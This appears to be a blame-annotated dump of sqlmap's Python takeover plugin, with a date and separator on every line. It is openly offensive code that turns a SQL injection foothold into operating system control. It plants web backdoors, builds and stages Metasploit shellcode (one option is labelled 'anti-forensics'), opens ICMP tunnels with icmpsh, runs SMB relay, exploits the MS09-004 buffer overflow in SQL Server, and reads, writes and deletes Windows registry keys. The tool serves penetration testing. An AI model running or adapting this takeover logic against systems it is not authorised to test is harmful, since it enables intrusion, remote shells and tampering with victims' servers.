2008-10-15 19:38:22 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
2008-10-15 19:56:32 +04:00
|
|
|
$Id$
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-10-14 18:41:14 +04:00
|
|
|
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
2010-10-15 03:18:29 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
2008-10-15 19:38:22 +04:00
|
|
|
"""
|
|
|
|
|
2010-10-28 03:01:17 +04:00
|
|
|
import os
|
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
from lib.core.common import Backend
|
2010-12-18 18:57:47 +03:00
|
|
|
from lib.core.common import isTechniqueAvailable
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.common import readInput
|
2010-10-28 01:02:22 +04:00
|
|
|
from lib.core.common import runningAsAdmin
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
2010-11-08 12:20:02 +03:00
|
|
|
from lib.core.enums import DBMS
|
2010-12-18 18:57:47 +03:00
|
|
|
from lib.core.enums import PAYLOAD
|
2010-10-28 01:10:56 +04:00
|
|
|
from lib.core.exception import sqlmapMissingDependence
|
2010-03-23 01:57:57 +03:00
|
|
|
from lib.core.exception import sqlmapMissingMandatoryOptionException
|
2010-10-28 01:02:22 +04:00
|
|
|
from lib.core.exception import sqlmapMissingPrivileges
|
2010-01-14 18:11:32 +03:00
|
|
|
from lib.core.exception import sqlmapNotVulnerableException
|
2010-03-23 01:57:57 +03:00
|
|
|
from lib.core.exception import sqlmapUndefinedMethod
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.exception import sqlmapUnsupportedDBMSException
|
|
|
|
from lib.takeover.abstraction import Abstraction
|
2010-10-28 01:02:22 +04:00
|
|
|
from lib.takeover.icmpsh import ICMPsh
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.takeover.metasploit import Metasploit
|
|
|
|
from lib.takeover.registry import Registry
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-03-23 01:57:57 +03:00
|
|
|
from plugins.generic.misc import Miscellaneous
|
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
|
2008-10-15 19:38:22 +04:00
|
|
|
"""
|
|
|
|
This class defines generic OS takeover functionalities for plugins.
|
|
|
|
"""
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
def __init__(self):
|
2010-03-23 01:57:57 +03:00
|
|
|
self.cmdTblName = "sqlmapoutput"
|
|
|
|
self.tblField = "data"
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
Abstraction.__init__(self)
|
|
|
|
|
|
|
|
def osCmd(self):
|
2010-12-18 18:57:47 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
|
2010-01-14 18:11:32 +03:00
|
|
|
web = False
|
2011-01-28 19:36:09 +03:00
|
|
|
elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.getIdentifiedDbms() == DBMS.MYSQL:
|
2010-01-14 17:03:16 +03:00
|
|
|
infoMsg = "going to use a web backdoor for command execution"
|
2009-04-28 15:05:07 +04:00
|
|
|
logger.info(infoMsg)
|
2010-01-28 20:22:17 +03:00
|
|
|
|
|
|
|
web = True
|
2009-04-28 15:05:07 +04:00
|
|
|
else:
|
2010-01-14 18:11:32 +03:00
|
|
|
errMsg = "unable to execute operating system commands via "
|
|
|
|
errMsg += "the back-end DBMS"
|
|
|
|
raise sqlmapNotVulnerableException(errMsg)
|
2010-01-14 17:33:08 +03:00
|
|
|
|
2010-01-14 18:11:32 +03:00
|
|
|
self.initEnv(web=web)
|
2010-01-15 21:00:15 +03:00
|
|
|
|
|
|
|
if not web or (web and self.webBackdoorUrl is not None):
|
|
|
|
self.runCmd(conf.osCmd)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-02-06 02:14:16 +03:00
|
|
|
if not conf.osShell and not conf.osPwn and not conf.cleanup:
|
|
|
|
self.cleanup()
|
|
|
|
|
2008-10-15 19:38:22 +04:00
|
|
|
def osShell(self):
|
2010-12-18 18:57:47 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
|
2010-01-14 18:11:32 +03:00
|
|
|
web = False
|
2011-01-28 19:36:09 +03:00
|
|
|
elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.getIdentifiedDbms() == DBMS.MYSQL:
|
2010-01-14 17:03:16 +03:00
|
|
|
infoMsg = "going to use a web backdoor for command prompt"
|
2009-04-22 15:48:07 +04:00
|
|
|
logger.info(infoMsg)
|
2010-01-28 20:22:17 +03:00
|
|
|
|
|
|
|
web = True
|
2009-04-22 15:48:07 +04:00
|
|
|
else:
|
2010-01-14 18:11:32 +03:00
|
|
|
errMsg = "unable to prompt for an interactive operating "
|
|
|
|
errMsg += "system shell via the back-end DBMS"
|
|
|
|
raise sqlmapNotVulnerableException(errMsg)
|
2010-01-14 17:33:08 +03:00
|
|
|
|
2010-01-14 18:11:32 +03:00
|
|
|
self.initEnv(web=web)
|
2010-01-15 21:00:15 +03:00
|
|
|
|
|
|
|
if not web or (web and self.webBackdoorUrl is not None):
|
|
|
|
self.shell()
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-02-06 02:14:16 +03:00
|
|
|
if not conf.osPwn and not conf.cleanup:
|
|
|
|
self.cleanup()
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
def osPwn(self):
|
2010-01-14 17:33:08 +03:00
|
|
|
goUdf = False
|
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
self.checkDbmsOs()
|
|
|
|
|
|
|
|
msg = "how do you want to establish the tunnel?"
|
|
|
|
msg += "\n[1] TCP: Metasploit Framework (default)"
|
|
|
|
msg += "\n[2] ICMP: icmpsh - ICMP tunneling"
|
|
|
|
|
|
|
|
while True:
|
|
|
|
tunnel = readInput(msg, default=1)
|
|
|
|
|
|
|
|
if isinstance(tunnel, basestring) and tunnel.isdigit() and int(tunnel) in ( 1, 2 ):
|
|
|
|
tunnel = int(tunnel)
|
|
|
|
break
|
|
|
|
|
|
|
|
elif isinstance(tunnel, int) and tunnel in ( 1, 2 ):
|
|
|
|
break
|
|
|
|
|
|
|
|
else:
|
|
|
|
warnMsg = "invalid value, valid values are 1 and 2"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
2010-10-28 03:01:17 +04:00
|
|
|
if tunnel == 2 and kb.os != "Windows":
|
2010-10-28 01:02:22 +04:00
|
|
|
errMsg = "icmpsh slave is only supported on Windows at "
|
|
|
|
errMsg += "the moment. The back-end database server is "
|
|
|
|
errMsg += "not. sqlmap will fallback to TCP (Metasploit)"
|
|
|
|
logger.error(errMsg)
|
|
|
|
|
|
|
|
tunnel = 1
|
|
|
|
|
|
|
|
if tunnel == 2:
|
|
|
|
isAdmin = runningAsAdmin()
|
|
|
|
|
|
|
|
if isAdmin is not True:
|
|
|
|
errMsg = "you need to run sqlmap as an administrator "
|
|
|
|
errMsg += "if you want to establish an out-of-band ICMP "
|
|
|
|
errMsg += "tunnel because icmpsh uses raw sockets to "
|
|
|
|
errMsg += "sniff and craft ICMP packets"
|
|
|
|
raise sqlmapMissingPrivileges, errMsg
|
|
|
|
|
2010-10-28 01:10:56 +04:00
|
|
|
try:
|
|
|
|
from impacket import ImpactDecoder
|
|
|
|
from impacket import ImpactPacket
|
|
|
|
except ImportError, _:
|
|
|
|
errMsg = "sqlmap requires 'impacket' third-party library "
|
|
|
|
errMsg += "in order to run icmpsh master. Download from "
|
|
|
|
errMsg += "http://oss.coresecurity.com/projects/impacket.html"
|
|
|
|
raise sqlmapMissingDependence, errMsg
|
|
|
|
|
2010-10-28 03:01:17 +04:00
|
|
|
sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all"
|
|
|
|
|
|
|
|
if os.path.exists(sysIgnoreIcmp):
|
|
|
|
fp = open(sysIgnoreIcmp, "wb")
|
|
|
|
fp.write("1")
|
|
|
|
fp.close()
|
|
|
|
else:
|
|
|
|
errMsg = "you need to disable ICMP replies by your machine "
|
|
|
|
errMsg += "system-wide. For example run on Linux/Unix:\n"
|
|
|
|
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n"
|
|
|
|
errMsg += "If you miss doing that, you will receive "
|
|
|
|
errMsg += "information from the database server and it "
|
|
|
|
errMsg += "is unlikely to receive commands send from you"
|
|
|
|
logger.error(errMsg)
|
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
|
2010-10-29 17:09:53 +04:00
|
|
|
self.sysUdfs.pop("sys_bineval")
|
2010-10-28 04:19:40 +04:00
|
|
|
|
2010-12-18 18:57:47 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
|
2010-01-14 18:11:32 +03:00
|
|
|
web = False
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2010-01-14 17:33:08 +03:00
|
|
|
self.getRemoteTempPath()
|
2010-10-28 01:02:22 +04:00
|
|
|
self.initEnv(web=web)
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
if tunnel == 1:
|
2011-01-28 19:36:09 +03:00
|
|
|
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
|
2010-10-28 01:02:22 +04:00
|
|
|
msg = "how do you want to execute the Metasploit shellcode "
|
|
|
|
msg += "on the back-end database underlying operating system?"
|
|
|
|
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
|
|
|
|
msg += "\n[2] Stand-alone payload stager (file system way)"
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
while True:
|
|
|
|
choice = readInput(msg, default=1)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
if isinstance(choice, basestring) and choice.isdigit() and int(choice) in ( 1, 2 ):
|
|
|
|
choice = int(choice)
|
|
|
|
break
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
elif isinstance(choice, int) and choice in ( 1, 2 ):
|
|
|
|
break
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
else:
|
|
|
|
warnMsg = "invalid value, valid values are 1 and 2"
|
|
|
|
logger.warn(warnMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
if choice == 1:
|
|
|
|
goUdf = True
|
2009-09-26 03:03:45 +04:00
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
if goUdf:
|
|
|
|
self.createMsfShellcode(exitfunc="thread", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
|
|
|
|
else:
|
|
|
|
self.createMsfPayloadStager()
|
|
|
|
self.uploadMsfPayloadStager()
|
2010-01-28 20:22:17 +03:00
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
if kb.os == "Windows" and conf.privEsc:
|
2011-01-28 19:36:09 +03:00
|
|
|
if Backend.getIdentifiedDbms() == DBMS.MYSQL:
|
2010-10-28 01:02:22 +04:00
|
|
|
debugMsg = "by default MySQL on Windows runs as SYSTEM "
|
|
|
|
debugMsg += "user, no need to privilege escalate"
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
|
|
|
elif kb.os != "Windows" and conf.privEsc:
|
|
|
|
# Unset --priv-esc if the back-end DBMS underlying operating
|
|
|
|
# system is not Windows
|
|
|
|
conf.privEsc = False
|
2010-01-14 18:11:32 +03:00
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
warnMsg = "sqlmap does not implement any operating system "
|
|
|
|
warnMsg += "user privilege escalation technique when the "
|
|
|
|
warnMsg += "back-end DBMS underlying system is not Windows"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
elif tunnel == 2:
|
|
|
|
self.uploadIcmpshSlave(web=web)
|
|
|
|
self.icmpPwn()
|
2010-10-28 04:19:40 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.getIdentifiedDbms() == DBMS.MYSQL:
|
2010-01-28 20:22:17 +03:00
|
|
|
web = True
|
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
infoMsg = "going to use a web backdoor to establish the tunnel"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-01-14 18:11:32 +03:00
|
|
|
self.initEnv(web=web)
|
|
|
|
|
|
|
|
if self.webBackdoorUrl:
|
2010-01-28 20:22:17 +03:00
|
|
|
if kb.os != "Windows" and conf.privEsc:
|
|
|
|
# Unset --priv-esc if the back-end DBMS underlying operating
|
|
|
|
# system is not Windows
|
|
|
|
conf.privEsc = False
|
|
|
|
|
|
|
|
warnMsg = "sqlmap does not implement any operating system "
|
|
|
|
warnMsg += "user privilege escalation technique when the "
|
|
|
|
warnMsg += "back-end DBMS underlying system is not Windows"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
2010-01-14 18:11:32 +03:00
|
|
|
self.getRemoteTempPath()
|
2010-10-28 01:02:22 +04:00
|
|
|
|
|
|
|
if tunnel == 1:
|
|
|
|
self.createMsfPayloadStager()
|
|
|
|
self.uploadMsfPayloadStager(web=web)
|
|
|
|
elif tunnel == 2:
|
|
|
|
self.uploadIcmpshSlave(web=web)
|
|
|
|
self.icmpPwn()
|
2010-01-14 18:11:32 +03:00
|
|
|
else:
|
|
|
|
errMsg = "unable to prompt for an out-of-band session via "
|
|
|
|
errMsg += "the back-end DBMS"
|
|
|
|
raise sqlmapNotVulnerableException(errMsg)
|
|
|
|
|
2010-10-28 01:02:22 +04:00
|
|
|
if tunnel == 1:
|
|
|
|
if not web or (web and self.webBackdoorUrl is not None):
|
|
|
|
self.pwn(goUdf)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-10-28 04:19:40 +04:00
|
|
|
if not conf.cleanup:
|
|
|
|
self.cleanup()
|
2010-02-06 02:14:16 +03:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
def osSmb(self):
|
|
|
|
self.checkDbmsOs()
|
|
|
|
|
|
|
|
if kb.os != "Windows":
|
|
|
|
errMsg = "the back-end DBMS underlying operating system is "
|
|
|
|
errMsg += "not Windows: it is not possible to perform the SMB "
|
|
|
|
errMsg += "relay attack"
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapUnsupportedDBMSException(errMsg)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-12-18 18:57:47 +03:00
|
|
|
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
|
2011-01-28 19:36:09 +03:00
|
|
|
if Backend.getIdentifiedDbms() in ( DBMS.PGSQL, DBMS.MSSQL ):
|
2009-04-22 15:48:07 +04:00
|
|
|
errMsg = "on this back-end DBMS it is only possible to "
|
|
|
|
errMsg += "perform the SMB relay attack if stacked "
|
|
|
|
errMsg += "queries are supported"
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapUnsupportedDBMSException(errMsg)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
elif Backend.getIdentifiedDbms() == DBMS.MYSQL:
|
2009-04-22 15:48:07 +04:00
|
|
|
debugMsg = "since stacked queries are not supported, "
|
|
|
|
debugMsg += "sqlmap is going to perform the SMB relay "
|
|
|
|
debugMsg += "attack via inference blind SQL injection"
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
|
|
|
printWarn = True
|
|
|
|
warnMsg = "it is unlikely that this attack will be successful "
|
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
if Backend.getIdentifiedDbms() == DBMS.MYSQL:
|
2009-04-22 15:48:07 +04:00
|
|
|
warnMsg += "because by default MySQL on Windows runs as "
|
|
|
|
warnMsg += "Local System which is not a real user, it does "
|
|
|
|
warnMsg += "not send the NTLM session hash when connecting to "
|
|
|
|
warnMsg += "a SMB service"
|
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
|
2009-04-22 15:48:07 +04:00
|
|
|
warnMsg += "because by default PostgreSQL on Windows runs "
|
|
|
|
warnMsg += "as postgres user which is a real user of the "
|
|
|
|
warnMsg += "system, but not within the Administrators group"
|
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
elif Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
|
|
|
|
warnMsg += "because often Microsoft SQL Server %s " % Backend.getVersion()
|
2009-04-22 15:48:07 +04:00
|
|
|
warnMsg += "runs as Network Service which is not a real user, "
|
|
|
|
warnMsg += "it does not send the NTLM session hash when "
|
|
|
|
warnMsg += "connecting to a SMB service"
|
|
|
|
|
|
|
|
else:
|
|
|
|
printWarn = False
|
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
if printWarn:
|
2009-04-22 15:48:07 +04:00
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
self.smb()
|
|
|
|
|
|
|
|
def osBof(self):
|
2010-12-18 18:57:47 +03:00
|
|
|
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
|
2009-04-22 15:48:07 +04:00
|
|
|
return
|
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
if not Backend.getIdentifiedDbms() == DBMS.MSSQL or not Backend.isVersionWithin(("2000", "2005")):
|
2009-04-22 15:48:07 +04:00
|
|
|
errMsg = "the back-end DBMS must be Microsoft SQL Server "
|
|
|
|
errMsg += "2000 or 2005 to be able to exploit the heap-based "
|
|
|
|
errMsg += "buffer overflow in the 'sp_replwritetovarbin' "
|
|
|
|
errMsg += "stored procedure (MS09-004)"
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapUnsupportedDBMSException(errMsg)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion()
|
2009-04-22 15:48:07 +04:00
|
|
|
infoMsg += "'sp_replwritetovarbin' stored procedure heap-based "
|
|
|
|
infoMsg += "buffer overflow (MS09-004)"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
self.initEnv(mandatory=False, detailed=True)
|
|
|
|
self.getRemoteTempPath()
|
2009-09-26 03:03:45 +04:00
|
|
|
self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True)
|
2009-04-22 15:48:07 +04:00
|
|
|
self.bof()
|
2009-09-26 03:03:45 +04:00
|
|
|
|
2010-03-23 01:57:57 +03:00
|
|
|
def uncPathRequest(self):
|
|
|
|
errMsg = "'uncPathRequest' method must be defined "
|
|
|
|
errMsg += "into the specific DBMS plugin"
|
|
|
|
raise sqlmapUndefinedMethod, errMsg
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
def __regInit(self):
|
2010-12-18 18:57:47 +03:00
|
|
|
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
|
2009-09-26 03:03:45 +04:00
|
|
|
return
|
|
|
|
|
|
|
|
self.checkDbmsOs()
|
|
|
|
|
|
|
|
if kb.os != "Windows":
|
|
|
|
errMsg = "the back-end DBMS underlying operating system is "
|
|
|
|
errMsg += "not Windows"
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapUnsupportedDBMSException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
self.initEnv()
|
|
|
|
self.getRemoteTempPath()
|
|
|
|
|
|
|
|
def regRead(self):
|
|
|
|
self.__regInit()
|
|
|
|
|
|
|
|
if not conf.regKey:
|
|
|
|
default = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
|
|
|
|
msg = "which registry key do you want to read? [%s] " % default
|
|
|
|
regKey = readInput(msg, default=default)
|
|
|
|
else:
|
|
|
|
regKey = conf.regKey
|
|
|
|
|
|
|
|
if not conf.regVal:
|
|
|
|
default = "ProductName"
|
|
|
|
msg = "which registry key value do you want to read? [%s] " % default
|
|
|
|
regVal = readInput(msg, default=default)
|
|
|
|
else:
|
|
|
|
regVal = conf.regVal
|
|
|
|
|
|
|
|
infoMsg = "reading Windows registry path '%s\%s' " % (regKey, regVal)
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-03-13 01:09:58 +03:00
|
|
|
return self.readRegKey(regKey, regVal, True)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
def regAdd(self):
|
|
|
|
self.__regInit()
|
|
|
|
|
|
|
|
errMsg = "missing mandatory option"
|
|
|
|
|
|
|
|
if not conf.regKey:
|
|
|
|
msg = "which registry key do you want to write? "
|
|
|
|
regKey = readInput(msg)
|
|
|
|
|
|
|
|
if not regKey:
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapMissingMandatoryOptionException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
else:
|
|
|
|
regKey = conf.regKey
|
|
|
|
|
|
|
|
if not conf.regVal:
|
|
|
|
msg = "which registry key value do you want to write? "
|
|
|
|
regVal = readInput(msg)
|
|
|
|
|
|
|
|
if not regVal:
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapMissingMandatoryOptionException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
else:
|
|
|
|
regVal = conf.regVal
|
|
|
|
|
|
|
|
if not conf.regData:
|
|
|
|
msg = "which registry key value data do you want to write? "
|
|
|
|
regData = readInput(msg)
|
|
|
|
|
|
|
|
if not regData:
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapMissingMandatoryOptionException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
else:
|
|
|
|
regData = conf.regData
|
|
|
|
|
|
|
|
if not conf.regType:
|
|
|
|
default = "REG_SZ"
|
|
|
|
msg = "which registry key value data-type is it? "
|
|
|
|
msg += "[%s] " % default
|
|
|
|
regType = readInput(msg, default=default)
|
|
|
|
else:
|
|
|
|
regType = conf.regType
|
|
|
|
|
|
|
|
infoMsg = "adding Windows registry path '%s\%s' " % (regKey, regVal)
|
|
|
|
infoMsg += "with data '%s'. " % regData
|
|
|
|
infoMsg += "This will work only if the user running the database "
|
|
|
|
infoMsg += "process has privileges to modify the Windows registry."
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
self.addRegKey(regKey, regVal, regType, regData)
|
|
|
|
|
|
|
|
def regDel(self):
|
|
|
|
self.__regInit()
|
|
|
|
|
|
|
|
errMsg = "missing mandatory option"
|
|
|
|
|
|
|
|
if not conf.regKey:
|
|
|
|
msg = "which registry key do you want to delete? "
|
|
|
|
regKey = readInput(msg)
|
|
|
|
|
|
|
|
if not regKey:
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapMissingMandatoryOptionException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
else:
|
|
|
|
regKey = conf.regKey
|
|
|
|
|
|
|
|
if not conf.regVal:
|
|
|
|
msg = "which registry key value do you want to delete? "
|
2009-12-21 14:04:54 +03:00
|
|
|
regVal = readInput(msg)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
if not regVal:
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapMissingMandatoryOptionException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
else:
|
|
|
|
regVal = conf.regVal
|
|
|
|
|
|
|
|
message = "are you sure that you want to delete the Windows "
|
|
|
|
message += "registry path '%s\%s? [y/N] " % (regKey, regVal)
|
|
|
|
output = readInput(message, default="N")
|
|
|
|
|
|
|
|
if output and output[0] not in ( "Y", "y" ):
|
|
|
|
return
|
|
|
|
|
2010-03-13 13:44:24 +03:00
|
|
|
infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal)
|
2009-09-26 03:03:45 +04:00
|
|
|
infoMsg += "This will work only if the user running the database "
|
|
|
|
infoMsg += "process has privileges to modify the Windows registry."
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
self.delRegKey(regKey, regVal)
|